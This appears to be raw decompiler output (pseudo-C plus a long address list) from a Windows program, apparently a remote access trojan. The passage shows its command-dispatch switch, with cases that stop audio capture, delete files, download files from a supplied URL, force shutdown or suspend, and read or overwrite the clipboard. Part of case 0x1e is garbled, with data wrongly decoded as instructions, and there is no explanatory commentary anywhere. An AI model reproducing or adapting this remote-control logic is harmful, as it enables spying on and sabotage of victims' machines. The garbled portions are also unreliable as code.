                                                                                                									 *0x46da74 = 1;
                                                                                                									waveInStop(??) = waveInClose( *0x46dab8);
                                                                                                									goto L127;
                                                                                                								case 0x1b:
                                                                                                									 *0x46dd60 =  *0x46dd60 + 1;
                                                                                                									__eflags =  *0x46dd60;
                                                                                                									__eax = 0x46dd60 + __eax;
                                                                                                									__ecx =  &_v444;
                                                                                                									__eax = E00401E3B( &_v444, __edx, __eflags, 1);
                                                                                                									__esp = __esp - 0x18;
                                                                                                									__ecx = __esp;
                                                                                                									__eax = E004020DE(__ebx, __esp, __edx, __eflags, __eax);
                                                                                                									__ecx =  &_v452;
                                                                                                									__eax = E00401E3B( &_v452, __edx, __eflags, 0);
                                                                                                									__esp = __esp - 0x18;
                                                                                                									__ecx = __esp;
                                                                                                									__eax = E004101C6(__ebx);
                                                                                                									__esp = __esp + 0x30;
                                                                                                									L37:
                                                                                                									 *0x46dd60 =  *0x46dd60 - 1;
                                                                                                									goto L127;
                                                                                                								case 0x1c:
                                                                                                									__ecx =  &_v444;
                                                                                                									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									E00401F87(__ecx) = DeleteFileW(__eax);
                                                                                                									goto L127;
                                                                                                								case 0x1d:
                                                                                                									__eax = E00410199();
                                                                                                									ExitProcess(0);
                                                                                                								case 0x1e:
                                                                                                									while(1) {
                                                                                                										__eflags =  *0x46dd60 - __ebx;
                                                                                                										if( *0x46dd60 == __ebx) {
                                                                                                											break;
                                                                                                										}
                                                                                                										Sleep(0x64);
                                                                                                									}
                                                                                                									asm("scasb");
                                                                                                									 *__eax =  *__eax | __eax;
                                                                                                									__al = __al + __ch;
                                                                                                									__eflags = __al;
                                                                                                									E0040ADA8();
                                                                                                									asm("pushad");
                                                                                                									__ecx = __ecx + 1;
                                                                                                									__bl = __bl + __ah;
                                                                                                									asm("das");
                                                                                                									__ecx = __ecx + 1;
                                                                                                									 *((intOrPtr*)(__edx + 0x39)) =  *((intOrPtr*)(__edx + 0x39)) + __bh;
                                                                                                									__ecx = __ecx + 1;
                                                                                                									__dh = __dh + __ch;
                                                                                                									__eflags = __eax - 0x3dee0041;
                                                                                                									__ecx = __ecx + 1;
                                                                                                									__ah = __ah + __ch;
                                                                                                									asm("das");
                                                                                                									__ecx = __ecx + 1;
                                                                                                									 *__eax =  *__eax + __dh;
                                                                                                									 *__ecx =  *__ecx ^ __al;
                                                                                                									 *__eax =  *__eax << __cl;
                                                                                                									__ecx = __ecx + 1;
                                                                                                									_a44 = _a44 + __dl;
                                                                                                									__ecx = __ecx + 1;
                                                                                                									 *((intOrPtr*)(__edx + 0x30)) =  *((intOrPtr*)(__edx + 0x30)) + __bh;
                                                                                                									__ecx = __ecx + 1;
                                                                                                									 *((intOrPtr*)(__ecx - 0x5affbed0)) =  *((intOrPtr*)(__ecx - 0x5affbed0)) + __ah;
                                                                                                									 *__ecx =  *__ecx ^ __al;
                                                                                                									asm("fnsave [eax]");
                                                                                                									__ecx = __ecx + 1;
                                                                                                									 *__edi =  *__edi + __dh;
                                                                                                									 *__ecx =  *__ecx ^ __eax;
                                                                                                									__eflags =  *__ecx;
                                                                                                									if( *__ecx < 0) {
                                                                                                										__ecx = __ecx + 1;
                                                                                                										 *((intOrPtr*)(__edx + 0x1f004131)) =  *((intOrPtr*)(__edx + 0x1f004131)) + __ah;
                                                                                                										__al = __al ^  *__ecx;
                                                                                                										__esi = __esi -  *__edx;
                                                                                                										__ecx = __ecx + 1;
                                                                                                										 *((intOrPtr*)(__eax + 0x32)) =  *((intOrPtr*)(__eax + 0x32)) + __dl;
                                                                                                										__ecx = __ecx + 1;
                                                                                                										 *((intOrPtr*)(__edi + 0x32)) =  *((intOrPtr*)(__edi + 0x32)) + __bl;
                                                                                                										__ecx = __ecx + 1;
                                                                                                										 *((intOrPtr*)(__esi + 0x32)) =  *((intOrPtr*)(__esi + 0x32)) + __ch;
                                                                                                										__ecx = __ecx + 1;
                                                                                                										 *((intOrPtr*)(__ebx - 0x3bffbece)) =  *((intOrPtr*)(__ebx - 0x3bffbece)) + __dl;
                                                                                                										__al = __al ^  *__ecx;
                                                                                                										asm("les edi, [ecx]");
                                                                                                										__ecx = __ecx + 1;
                                                                                                										__dh = __dh + __ch;
                                                                                                										__eflags = __eax - 0x3dee0041;
                                                                                                										__ecx = __ecx + 1;
                                                                                                										__ah = __ah + __dl;
                                                                                                										__al = __al ^  *__ecx;
                                                                                                										__eflags = __al;
                                                                                                									}
                                                                                                									 *__eax =  *__eax + __bh;
                                                                                                									__eax = __eax ^  *__ecx;
                                                                                                									__ebp =  &_v5;
                                                                                                									__eax = __eax ^  *__ecx;
                                                                                                									__esp =  &_v5;
                                                                                                									_pop(__ebp);
                                                                                                									__eax = __eax ^  *__ecx;
                                                                                                									asm("in eax, dx");
                                                                                                									__eax = __eax ^  *__ecx;
                                                                                                									__al = __al - 0x34;
                                                                                                									__ecx = __ecx + 1;
                                                                                                									 *((intOrPtr*)(__edx + 0x34)) =  *((intOrPtr*)(__edx + 0x34)) + __cl;
                                                                                                									__ecx = __ecx + 1;
                                                                                                									 *((intOrPtr*)(__edi + 0x34)) =  *((intOrPtr*)(__edi + 0x34)) + __bl;
                                                                                                									__ecx = __ecx + 1;
                                                                                                									 *((intOrPtr*)(__esp + __esi + 0x41)) =  *((intOrPtr*)(__esp + __esi + 0x41)) + __ch;
                                                                                                									 *((intOrPtr*)(__esi + 0x34)) =  *((intOrPtr*)(__esi + 0x34)) + __bh;
                                                                                                									__ecx = __ecx + 1;
                                                                                                									 *((intOrPtr*)(__esi + 0x357f0041)) =  *((intOrPtr*)(__esi + 0x357f0041)) + __cl;
                                                                                                									__ecx = __ecx + 1;
                                                                                                									__ebx->i = __ebx->i + __cl;
                                                                                                									__ecx = __ecx + 1;
                                                                                                									 *((intOrPtr*)(__edx + 0x18004137)) =  *((intOrPtr*)(__edx + 0x18004137)) + __dh;
                                                                                                									asm("aaa");
                                                                                                									__ecx = __ecx + 1;
                                                                                                									 *((intOrPtr*)(__edi + 0x14004137)) =  *((intOrPtr*)(__edi + 0x14004137)) + __dl;
                                                                                                									__eflags =  *__ecx - __al;
                                                                                                									__eax = __eax - 1;
                                                                                                									 *0xc2004138 = __al;
                                                                                                									__eflags =  *__ecx - __al;
                                                                                                									asm("loop 0x3a");
                                                                                                									__ecx = __ecx + 1;
                                                                                                									 *__edx =  *__edx + __al;
                                                                                                									__eflags =  *__ecx - __eax;
                                                                                                									_pop(__edx);
                                                                                                									__eflags =  *__ecx - __eax;
                                                                                                									asm("out dx, al");
                                                                                                									__eflags = __eax - 0x39a40041;
                                                                                                									__ecx = __ecx + 1;
                                                                                                									 *__edi =  *__edi + __dl;
                                                                                                									__eax -  *__ecx = __al - 0x3b;
                                                                                                									__ecx = __ecx + 1;
                                                                                                									 *((intOrPtr*)(__edi + __esp)) =  *((intOrPtr*)(__edi + __esp)) + __bh;
                                                                                                									__ecx = __ecx + 1;
                                                                                                									 *((intOrPtr*)(__esp + __edi + 0x3cd40041)) =  *((intOrPtr*)(__esp + __edi + 0x3cd40041)) + __dh;
                                                                                                									__ecx = __ecx + 1;
                                                                                                									__ah = __ah + __dh;
                                                                                                									__eflags = __al -  *__ecx;
                                                                                                									if(__al !=  *__ecx) {
                                                                                                										__ecx = __ecx + 1;
                                                                                                										 *((intOrPtr*)(__esp + __edi + 0x3d7a0041)) =  *((intOrPtr*)(__esp + __edi + 0x3d7a0041)) + __dl;
                                                                                                										__ecx = __ecx + 1;
                                                                                                										 *((intOrPtr*)(__ecx - 0x77ffbec3)) =  *((intOrPtr*)(__ecx - 0x77ffbec3)) + __al;
                                                                                                										__eflags = __eax - 0x3d4b0041;
                                                                                                										__ecx = __ecx + 1;
                                                                                                										__ah = __ah + __dh;
                                                                                                										__eflags = __al - 0x41;
                                                                                                										 *((intOrPtr*)(__edi - 0x1ffbec3)) =  *((intOrPtr*)(__edi - 0x1ffbec3)) + __cl;
                                                                                                										__eflags = __al - 0x41;
                                                                                                										 *((intOrPtr*)(__edi + __esp)) =  *((intOrPtr*)(__edi + __esp)) + __ch;
                                                                                                										__ecx = __ecx + 1;
                                                                                                										__ebx->i = __ebx->i + __dh;
                                                                                                										__eflags = __al - 0x41;
                                                                                                										__cl = __cl + __al;
                                                                                                										__eflags = __eax -  *__ecx;
                                                                                                										asm("out dx, al");
                                                                                                										__eflags = __eax - 0x12000041;
                                                                                                										asm("adc al, [ecx]");
                                                                                                										asm("adc al, [edx]");
                                                                                                										__edx = __edx +  *__edx;
                                                                                                										__al = __al + 5;
                                                                                                										__eflags = __al;
                                                                                                										_push(es);
                                                                                                									}
                                                                                                									_pop(es);
                                                                                                									asm("adc dl, [edx]");
                                                                                                									asm("adc cl, [eax]");
                                                                                                									 *__edx =  *__edx | __ecx;
                                                                                                									asm("adc cl, [ebx]");
                                                                                                									__al = __al | 0x00000012;
                                                                                                									asm("adc dl, [edx]");
                                                                                                									asm("adc dl, [edx]");
                                                                                                									asm("adc dl, [edx]");
                                                                                                									__eax = __eax | 0x12100f0e;
                                                                                                									asm("adc dl, [edx]");
                                                                                                									asm("adc [esi-0x75], edx");
                                                                                                									_push(__esi);
                                                                                                									__esi = __ecx;
                                                                                                									__ecx = __esi + 4;
                                                                                                									E004047EF(0) = __esi;
                                                                                                									_pop(__esi);
                                                                                                									return __esi;
                                                                                                									goto L135;
                                                                                                								case 0x1f:
                                                                                                									__eax = E0040B4AC(__ebx, __eflags);
                                                                                                									goto L127;
                                                                                                								case 0x20:
                                                                                                									while(1) {
                                                                                                										__eflags =  *0x46dd60 - __ebx; // 0x0
                                                                                                										if(__eflags == 0) {
                                                                                                											break;
                                                                                                										}
                                                                                                										Sleep(0x64);
                                                                                                									}
                                                                                                									__ebx = 0;
                                                                                                									__ecx =  &_v444;
                                                                                                									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									__eax = E00401F87(__eax);
                                                                                                									__ecx =  &_v448;
                                                                                                									__esi = __eax;
                                                                                                									__ecx = E00401E3B( &_v448, __edx, __eflags, 1);
                                                                                                									__eax = E00401F87(__eax);
                                                                                                									__dl =  *__esi;
                                                                                                									__ecx =  &_v432;
                                                                                                									__eax = E00418A4B( &_v432, __edx, __eax);
                                                                                                									_push(0);
                                                                                                									_push(0);
                                                                                                									__ecx =  &_v432;
                                                                                                									_push(E00401EDD( &_v432));
                                                                                                									__ecx =  &_v452;
                                                                                                									__ecx = E00401E3B( &_v452, __edx, __eflags, 2);
                                                                                                									__eax = E00401F87(__eax);
                                                                                                									_push(__eax);
                                                                                                									_push(0);
                                                                                                									__imp__URLDownloadToFileW();
                                                                                                									__eflags = __eax;
                                                                                                									if(__eflags == 0) {
                                                                                                										goto L59;
                                                                                                									}
                                                                                                									goto L107;
                                                                                                								case 0x21:
                                                                                                									while(1) {
                                                                                                										__eflags =  *0x46dd60 - __ebx; // 0x0
                                                                                                										if(__eflags == 0) {
                                                                                                											break;
                                                                                                										}
                                                                                                										Sleep(0x64);
                                                                                                									}
                                                                                                									__ecx =  &_v444;
                                                                                                									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									__eax = E00401F87(__eax);
                                                                                                									__ecx =  &_v448;
                                                                                                									__esi = __eax;
                                                                                                									__ecx = E00401E3B( &_v448, __edx, __eflags, 1);
                                                                                                									__eax = E00401F87(__eax);
                                                                                                									__dl =  *__esi;
                                                                                                									__ecx =  &_v432;
                                                                                                									__eax = E00418A4B( &_v432, __edx, __eax);
                                                                                                									__ecx =  &_v432;
                                                                                                									__eax = E00401EDD( &_v432);
                                                                                                									__ecx =  &_v452;
                                                                                                									__esi = __eax;
                                                                                                									__eax = E00401E3B( &_v452, __edx, __eflags, 2);
                                                                                                									__esp = __esp - 0x18;
                                                                                                									__ecx = __esp;
                                                                                                									__eax = E004020DE(__ebx, __esp, __edx, __eflags, __eax);
                                                                                                									__ecx = __esi;
                                                                                                									__eax = E0041843E(__esi);
                                                                                                									__esp = __esp + 0x18;
                                                                                                									__eflags = __al;
                                                                                                									if(__eflags != 0) {
                                                                                                										L59:
                                                                                                										__esp = __esp - 0x18;
                                                                                                										__eax =  &_v444;
                                                                                                										__ecx = __esp;
                                                                                                										E004074B3(__ebx, __esp, __edx, __eflags,  &_v444) = E0040B106();
                                                                                                										__esp = __esp + 0x18;
                                                                                                									}
                                                                                                									goto L107;
                                                                                                								case 0x22:
                                                                                                									__ecx =  &_v444;
                                                                                                									__ecx = E00401E3B( &_v444, __edx, __eflags, 2);
                                                                                                									__eax = E00401F87(__ecx);
                                                                                                									__eax = __eax + 0x10000;
                                                                                                									__ecx =  &_v448;
                                                                                                									__ecx = E00401E3B( &_v448, __edx, __eflags, 1);
                                                                                                									__eax = E00401F87(__eax);
                                                                                                									__ebx = 0;
                                                                                                									__ecx =  &_v452;
                                                                                                									__ecx = E00401E3B( &_v452, __edx, __eflags, 0);
                                                                                                									__eax = E00401F87(__eax);
                                                                                                									__eax = MessageBoxW(0, __eax, __eax, __eax);
                                                                                                									__ecx =  &_v456;
                                                                                                									__esi = __eax;
                                                                                                									__eax = E00401E3B( &_v456, __edx, __eflags, 0);
                                                                                                									__esp = __esp - 0x18;
                                                                                                									__ecx =  &_v384;
                                                                                                									__edi = __esp;
                                                                                                									__edx = __esi;
                                                                                                									__edx = E00417C16(0,  &_v384, __esi);
                                                                                                									__ecx =  &_v408;
                                                                                                									__edx = __eax;
                                                                                                									__ecx = __edi;
                                                                                                									__eax = E00402F85(0, __edi, __edx, __eflags, __eax);
                                                                                                									_push(0x26);
                                                                                                									L126:
                                                                                                									__ecx = 0x46e848;
                                                                                                									__eax = E00404BB7(__ebx, 0x46e848, __edx, __eflags);
                                                                                                									__ecx =  &_v420;
                                                                                                									__eax = E00401FB9();
                                                                                                									__ecx =  &_v396;
                                                                                                									__eax = E00401FB9();
                                                                                                									goto L127;
                                                                                                								case 0x23:
                                                                                                									__eax = E00414367();
                                                                                                									__ebx = 0;
                                                                                                									__ecx =  &_v444;
                                                                                                									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									__edx = "0";
                                                                                                									__ecx = __eax;
                                                                                                									__eax = E00405C1B(__edx);
                                                                                                									__ecx =  &_v448;
                                                                                                									_push(0);
                                                                                                									__eflags = __al;
                                                                                                									if(__eflags == 0) {
                                                                                                										__eax = E00401E3B( &_v448, __edx, __eflags);
                                                                                                										__edx = "1";
                                                                                                										__ecx = __eax;
                                                                                                										__eax = E00405C1B(__edx);
                                                                                                										__ecx =  &_v448;
                                                                                                										_push(0);
                                                                                                										__eflags = __al;
                                                                                                										if(__eflags == 0) {
                                                                                                											__eax = E00401E3B( &_v448, __edx, __eflags);
                                                                                                											__edx = "2";
                                                                                                											__ecx = __eax;
                                                                                                											__eax = E00405C1B(__edx);
                                                                                                											__eflags = __al;
                                                                                                											if(__eflags == 0) {
                                                                                                												__eax = LoadLibraryA("PowrProf.dll");
                                                                                                												__eax = GetProcAddress(__eax, "SetSuspendState");
                                                                                                												__ecx =  &_v444;
                                                                                                												__esi = __eax;
                                                                                                												__eax = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                												__edx = "3";
                                                                                                												__ecx = __eax;
                                                                                                												__eax = E00405C1B(__edx);
                                                                                                												_push(0);
                                                                                                												__eflags = __al;
                                                                                                												if(__eflags == 0) {
                                                                                                													__ecx =  &_v444;
                                                                                                													__eax = E00401E3B( &_v444, __edx, __eflags);
                                                                                                													__edx = "4";
                                                                                                													__ecx = __eax;
                                                                                                													__eax = E00405C1B(__edx);
                                                                                                													__eflags = __al;
                                                                                                													if(__al != 0) {
                                                                                                														_push(0);
                                                                                                														_push(0);
                                                                                                														_push(1);
                                                                                                														goto L76;
                                                                                                													}
                                                                                                												} else {
                                                                                                													_push(0);
                                                                                                													_push(0);
                                                                                                													L76:
                                                                                                													__eax =  *__esi();
                                                                                                												}
                                                                                                											} else {
                                                                                                												_push(0);
                                                                                                												__ecx =  &_v444;
                                                                                                												__ecx = E00401E3B( &_v444, __edx, __eflags, 1);
                                                                                                												__eax = E00401F87(__ecx);
                                                                                                												__eax = E004374E4(__ecx, __eax);
                                                                                                												__eax = __eax | 0x00000002;
                                                                                                												__eflags = __eax;
                                                                                                												goto L71;
                                                                                                											}
                                                                                                										} else {
                                                                                                											__ecx = E00401E3B( &_v448, __edx, __eflags, 1);
                                                                                                											__eax = E00401F87(__ecx);
                                                                                                											__eax = E004374E4(__ecx, __eax);
                                                                                                											__eax = __eax | 0x00000001;
                                                                                                											goto L71;
                                                                                                										}
                                                                                                									} else {
                                                                                                										__ecx = E00401E3B( &_v448, __edx, __eflags, 1);
                                                                                                										__eax = E00401F87(__ecx);
                                                                                                										__eax = E004374E4(__ecx, __eax);
                                                                                                										L71:
                                                                                                										_pop(__ecx);
                                                                                                										__eax = ExitWindowsEx(__eax, ??);
                                                                                                									}
                                                                                                									goto L127;
                                                                                                								case 0x24:
                                                                                                									L82:
                                                                                                									__eax = OpenClipboard(__ebx);
                                                                                                									__eflags = __eax;
                                                                                                									if(__eax != 0) {
                                                                                                										__esi = GetClipboardData(0xd);
                                                                                                										__edi = GlobalLock(__esi);
                                                                                                										GlobalUnlock(__esi) = CloseClipboard();
                                                                                                										__eflags = __edi;
                                                                                                										0x46079c =  !=  ? __edi : 0x46079c;
                                                                                                										__ecx =  &_v424;
                                                                                                										__eax = E00404260(__ebx,  &_v424,  !=  ? __edi : 0x46079c);
                                                                                                										__esp = __esp - 0x18;
                                                                                                										__edx =  &_v428;
                                                                                                										__ecx = __esp;
                                                                                                										__eax = E00417D8C(__ebx, __esp, __edx);
                                                                                                										_push(0x6b);
                                                                                                										__ecx = 0x46e848;
                                                                                                										__eax = E00404BB7(__ebx, 0x46e848, __edx, __eflags);
                                                                                                										L107:
                                                                                                										__ecx =  &_v424;
                                                                                                										L108:
                                                                                                										__eax = E00401EE2();
                                                                                                									}
                                                                                                									goto L127;
                                                                                                								case 0x25:
                                                                                                									__eflags = OpenClipboard(0);
                                                                                                									if(__eflags != 0) {
                                                                                                										__eax = EmptyClipboard();
                                                                                                										__ecx =  &_v444;
                                                                                                										__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                										__eax = E0040247B();
                                                                                                										__eax = __eax + 2;
                                                                                                										__edi = __eax;
                                                                                                										__eax = GlobalLock(__edi);
                                                                                                										__ecx =  &_v448;
                                                                                                										__esi = __eax;
                                                                                                										__ecx = E00401E3B( &_v448, __edx, __eflags, 0);
                                                                                                										__eax = E0040247B();
                                                                                                										__ecx =  &_v452;
                                                                                                										__ecx = E00401E3B( &_v452, __edx, __eflags, 0);
                                                                                                										GlobalUnlock(__edi) = SetClipboardData(0xd, __edi);
                                                                                                										goto L81;
                                                                                                									}
                                                                                                									goto L127;
                                                                                                								case 0x26:
                                                                                                									__eax = OpenClipboard(0);
                                                                                                									__eflags = __eax;
                                                                                                									if(__eax != 0) {
                                                                                                										__eax = EmptyClipboard();
                                                                                                										L81:
                                                                                                										__eax = CloseClipboard();
                                                                                                										goto L82;
                                                                                                									}
                                                                                                									goto L127;
                                                                                                								case 0x27:
                                                                                                									__ebx = 0;
                                                                                                									__ecx =  &_v444;
                                                                                                									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									__eax = E0040247B();
                                                                                                									__ecx =  &_v448;
                                                                                                									__esi = __eax;
                                                                                                									__ecx = E00401E3B( &_v448, __edx, __eflags, 0);
                                                                                                									__eax = E00401F87(__eax);
                                                                                                									__edx = __esi;
                                                                                                									__ecx = __eax;
                                                                                                									__eax = E0040F6D9();
                                                                                                									goto L127;
                                                                                                								case 0x28:
                                                                                                									__eax =  &_v428;
                                                                                                									__ebx = 0;
                                                                                                									__ecx =  &_v444;
                                                                                                									_v428 = 0;
                                                                                                									_v432 = 0;
                                                                                                									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									__eax = E00401F87(__eax);
                                                                                                									__edx =  &_v436;
                                                                                                									__ecx = __eax;
                                                                                                									__eax = E00417B01(__eax, __edx,  &_v428);
                                                                                                									__eflags = __eax - 1;
                                                                                                									if(__eax == 1) {
                                                                                                										__edx = _v428;
                                                                                                										__ecx = _v432;
                                                                                                										E0040F6D9() = L00437769(_v432);
                                                                                                										L26:
                                                                                                										_pop(__ecx);
                                                                                                									}
                                                                                                									goto L127;
                                                                                                								case 0x29:
                                                                                                									__eax = E0040A767(__ebx, __eflags);
                                                                                                									goto L127;
                                                                                                								case 0x2a:
                                                                                                									__ecx =  &_v444;
                                                                                                									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									__esp = __esp - 0x18;
                                                                                                									__ecx = __esp;
                                                                                                									__eax = E004146CF(__ebx, __edx);
                                                                                                									goto L104;
                                                                                                								case 0x2b:
                                                                                                									__ecx =  &_v444;
                                                                                                									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									__esp = __esp - 0x18;
                                                                                                									__ecx = __esp;
                                                                                                									__eax = E00411820(__ebx, __edx);
                                                                                                									goto L104;
                                                                                                								case 0x2c:
                                                                                                									__ecx =  &_v444;
                                                                                                									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									__esp = __esp - 0x18;
                                                                                                									__ecx = __esp;
                                                                                                									__eax = E00405531(__ebx, __edx, __eflags);
                                                                                                									goto L104;
                                                                                                								case 0x2d:
                                                                                                									_push(__ecx);
                                                                                                									__esi = 0x46e5f0;
                                                                                                									__ecx = 0x46e5f0;
                                                                                                									__eax = E0040247B();
                                                                                                									__ecx = 0x46e5f0;
                                                                                                									__eax = E00401F87(0x46e5f0);
                                                                                                									__ebx = 0;
                                                                                                									__ecx =  &_v444;
                                                                                                									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									E0040247B() = __eax + 1;
                                                                                                									__ecx =  &_v448;
                                                                                                									__ecx = E00401E3B( &_v448, __edx, __eflags, 0);
                                                                                                									__eax = E00401F87(__eax);
                                                                                                									__ecx = 0x46e5a8;
                                                                                                									__edx = E00401F87(0x46e5a8);
                                                                                                									__eax = E00410CAF(__edx, __eflags, "name", __eax, __eax, __eax, __eax);
                                                                                                									goto L104;
                                                                                                								case 0x2e:
                                                                                                									__ecx =  &_v444;
                                                                                                									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									__esp = __esp - 0x18;
                                                                                                									__ecx = __esp;
                                                                                                									__eax = E0040EE85(__ebx, __edx, __eflags);
                                                                                                									goto L104;
                                                                                                								case 0x2f:
                                                                                                									__ecx =  &_v444;
                                                                                                									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
                                                                                                									__esp = __esp - 0x18;
                                                                                                									__ecx = __esp;
                                                                                                									__eax = E0041656F(__ebx);
                                                                                                									L104:
                                                                                                									goto L127;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				L135:
                                                                                                			}
                                                                                                0x00000000
                                                                                                0x00412e47
                                                                                                0x00412e47
                                                                                                0x004139e5
                                                                                                0x00413a02
                                                                                                0x00413a0d
                                                                                                0x00413a17
                                                                                                0x00413a27
                                                                                                0x00413a27
                                                                                                0x00413a2a
                                                                                                0x00413a2f
                                                                                                0x00413a35
                                                                                                0x00413a40
                                                                                                0x00413a4b
                                                                                                0x00413a68
                                                                                                0x00413a85
                                                                                                0x00413a91
                                                                                                0x00413a96
                                                                                                0x00413a9e
                                                                                                0x00413ac1
                                                                                                0x00413ac1
                                                                                                0x00413acd
                                                                                                0x00000000
                                                                                                0x00412e4d
                                                                                                0x00412e4d
                                                                                                0x00412e51
                                                                                                0x00413dee
                                                                                                0x00413df2
                                                                                                0x00413dfe
                                                                                                0x00413e0a
                                                                                                0x00413e17
                                                                                                0x00412e57
                                                                                                0x00412e59
                                                                                                0x00000000
                                                                                                0x00412e6c
                                                                                                0x00412e83
                                                                                                0x00412e9f
                                                                                                0x00412efa
                                                                                                0x00412efe
                                                                                                0x00412f09
                                                                                                0x00412f0d
                                                                                                0x00412f16
                                                                                                0x00412f22
                                                                                                0x00412f2e
                                                                                                0x00412f3a
                                                                                                0x00412f46
                                                                                                0x00412f52
                                                                                                0x00412f5e
                                                                                                0x00412f67
                                                                                                0x00412f70
                                                                                                0x00412f88
                                                                                                0x00412f90
                                                                                                0x00412fbd
                                                                                                0x00412fc2
                                                                                                0x00412fc9
                                                                                                0x00412fce
                                                                                                0x00412fd0
                                                                                                0x00412fd6
                                                                                                0x00412fd7
                                                                                                0x00000000
                                                                                                0x00412fd7
                                                                                                0x00412f92
                                                                                                0x00412f94
                                                                                                0x00412f9e
                                                                                                0x00412fae
                                                                                                0x00412fa0
                                                                                                0x00412fa1
                                                                                                0x00412fa1
                                                                                                0x00412f9e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00412fe3
                                                                                                0x00412fe5
                                                                                                0x00412fd9
                                                                                                0x00412fd9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041397a
                                                                                                0x0041397e
                                                                                                0x00413983
                                                                                                0x00413986
                                                                                                0x00413988
                                                                                                0x0041398a
                                                                                                0x0041398f
                                                                                                0x00413991
                                                                                                0x00413996
                                                                                                0x0041399b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00412ff3
                                                                                                0x00412ffa
                                                                                                0x00412fff
                                                                                                0x00413002
                                                                                                0x00413006
                                                                                                0x00413008
                                                                                                0x00413013
                                                                                                0x00413015
                                                                                                0x0041301f
                                                                                                0x00413021
                                                                                                0x00413023
                                                                                                0x00413029
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413032
                                                                                                0x0041303b
                                                                                                0x0041303d
                                                                                                0x00413049
                                                                                                0x0041304b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004130d3
                                                                                                0x004130d3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413057
                                                                                                0x00413060
                                                                                                0x00413062
                                                                                                0x0041306f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041307a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004130a1
                                                                                                0x0041307c
                                                                                                0x0041307c
                                                                                                0x0041307e
                                                                                                0x0041307e
                                                                                                0x00413087
                                                                                                0x00413089
                                                                                                0x00413096
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004130a5
                                                                                                0x004130ac
                                                                                                0x004130b5
                                                                                                0x004130b7
                                                                                                0x004130c4
                                                                                                0x004130ca
                                                                                                0x004130ce
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004130dd
                                                                                                0x004130df
                                                                                                0x004130eb
                                                                                                0x004130ed
                                                                                                0x004130f3
                                                                                                0x004130f7
                                                                                                0x004130fd
                                                                                                0x00413102
                                                                                                0x0041310c
                                                                                                0x0041311f
                                                                                                0x00413125
                                                                                                0x00413129
                                                                                                0x0041312e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413139
                                                                                                0x0041313d
                                                                                                0x00413143
                                                                                                0x00413148
                                                                                                0x0041314d
                                                                                                0x00413153
                                                                                                0x0041315b
                                                                                                0x0041315f
                                                                                                0x00413164
                                                                                                0x00413167
                                                                                                0x0041316f
                                                                                                0x00000000
                                                                                                0x0041316f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041317b
                                                                                                0x0041317d
                                                                                                0x00413189
                                                                                                0x00413197
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004131a4
                                                                                                0x004131a8
                                                                                                0x004131ae
                                                                                                0x004131b3
                                                                                                0x004131ba
                                                                                                0x004131c3
                                                                                                0x004131c5
                                                                                                0x004131d1
                                                                                                0x004131d3
                                                                                                0x004131db
                                                                                                0x004131e4
                                                                                                0x004131e6
                                                                                                0x004131ec
                                                                                                0x004131f2
                                                                                                0x004131f4
                                                                                                0x004131fa
                                                                                                0x004131fa
                                                                                                0x004131fa
                                                                                                0x00413202
                                                                                                0x0041320a
                                                                                                0x00413210
                                                                                                0x00413212
                                                                                                0x00413214
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041321f
                                                                                                0x00413220
                                                                                                0x00413225
                                                                                                0x00413225
                                                                                                0x00413227
                                                                                                0x00413228
                                                                                                0x0041322a
                                                                                                0x0041322a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041322d
                                                                                                0x00413231
                                                                                                0x00413236
                                                                                                0x00413239
                                                                                                0x0041323c
                                                                                                0x00413241
                                                                                                0x00413246
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413250
                                                                                                0x00413255
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041325f
                                                                                                0x00413264
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413270
                                                                                                0x00413274
                                                                                                0x0041327a
                                                                                                0x0041327f
                                                                                                0x00413284
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413293
                                                                                                0x00413293
                                                                                                0x00413294
                                                                                                0x00413299
                                                                                                0x0041329f
                                                                                                0x004132a4
                                                                                                0x004132a7
                                                                                                0x004132aa
                                                                                                0x004132af
                                                                                                0x004132b4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004132c4
                                                                                                0x004132c9
                                                                                                0x004132cb
                                                                                                0x004132d0
                                                                                                0x00413289
                                                                                                0x00413289
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004139c4
                                                                                                0x004139c5
                                                                                                0x004139ca
                                                                                                0x004135c6
                                                                                                0x004135cd
                                                                                                0x004135d1
                                                                                                0x004135d3
                                                                                                0x004135d8
                                                                                                0x004135db
                                                                                                0x004135df
                                                                                                0x004135e1
